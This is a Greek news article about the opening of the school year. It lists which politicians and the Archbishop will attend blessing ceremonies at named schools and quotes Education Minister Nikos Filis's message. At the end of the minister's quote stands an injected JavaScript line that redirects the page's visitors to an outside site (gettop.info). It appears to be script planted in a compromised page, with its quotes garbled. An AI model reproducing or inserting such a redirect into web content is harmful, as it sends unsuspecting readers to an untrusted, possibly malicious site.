Ξεκινά η σχολική χρονιά – Το μήνυμα Φίλη – Πού θα βρεθεί η πολιτική ηγεσία

0
6

 

Αγιασμός θα τελεστεί στα σχολεία της χώρας κι έπειτα θα διανεμηθούν τα σχολικά βιβλία κηρύσσοντας έτσι την έναρξη της νέας σχολικής χρονιάς.

Ο Πρόεδρος της Δημοκρατίας Προκόπης Παυλόπουλος θα παρακολουθούσε τον αγιασμό στο 14ο Δημοτικό Σχολείο Νίκαιας και στο 4ο Δημοτικό Σχολείο Αιγάλεω «Μίκης Θεοδωράκης».

Ο πρωθυπουργός Αλέξης Τσίπρας επρόκειτο να επισκεφθεί την Κεφαλονιά για να εγκαινιάσει το σχολικό συγκρότημα Α’ και Β’ Λυκείου στη θέση «Φαραώ» και να παραστεί στον αγιασμό. Η επίσκεψη αυτή ωστόσο ματαιώθηκε τελευταία στιγμή προκειμένου να μεταβεί στις πληγείσες από την πυρκαγιά περιοχές στη Θάσο.

Ο πρόεδρος της Νέας Δημοκρατίας Κυριάκος Μητσοτάκης, θα παραστεί στον κοινό αγιασμό του 1ου Δημοτικού και του Ειδικού Δημοτικού Σχολείου Περάματος.

Ο υπουργός Παιδείας Νίκος Φίλης και ο δήμαρχος Αθηναίων Γιώργος Καμίνης θα παραβρεθούν στο 132ο Δημοτικό σχολείο στη Γκράβα.

Ο γ.γ. της Κ.Ε. του ΚΚΕ Δημήτρης Κουτσούμπας θα επισκεφθεί το 7ο Δημοτικό Σχολείο Καισαριανής.

Ο Αρχιεπίσκοπος Αθηνών και πάσης Ελλάδος Ιερώνυμος θα παραβρεθεί στο αγιασμό στα εκπαιδευτήρια «Η Θεομήτωρ».

Μήνυμα υπουργού Παιδείας

Στο μήνυμά του ενόψει της νέας σχολικής χρονιάς ο υπουργός Παιδείας έδωσε τη διαβεβαίωση ότι από την πλευρά του υπουργείου έχει καταβληθεί μεγάλη προσπάθεια για να είναι καλή η χρονιά.

«Τα ωρολόγια προγράμματα, το πλαίσιο λειτουργίας του σχολείου και η διδακτέα ύλη έχουν ανανεωθεί, τα βιβλία σας περιμένουν από το καλοκαίρι και τα έξοδα των σχολικών επιτροπών έχουν ήδη καλυφθεί από το υπουργείο Εσωτερικών. Φέτος δεν λείπουν από τα σχολεία εκπαιδευτικοί, χάρη αφενός σε ένα επιτυχή σχεδιασμό του υπουργείου Παιδείας, ώστε, να ολοκληρωθούν όλες οι αναγκαίες διαδικασίες ταχύτατα και άρα έγκαιρα, αφετέρου χάρη στη συνδρομή του υπουργείου Οικονομικών που εξασφάλισε τα απαραίτητα κονδύλια». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here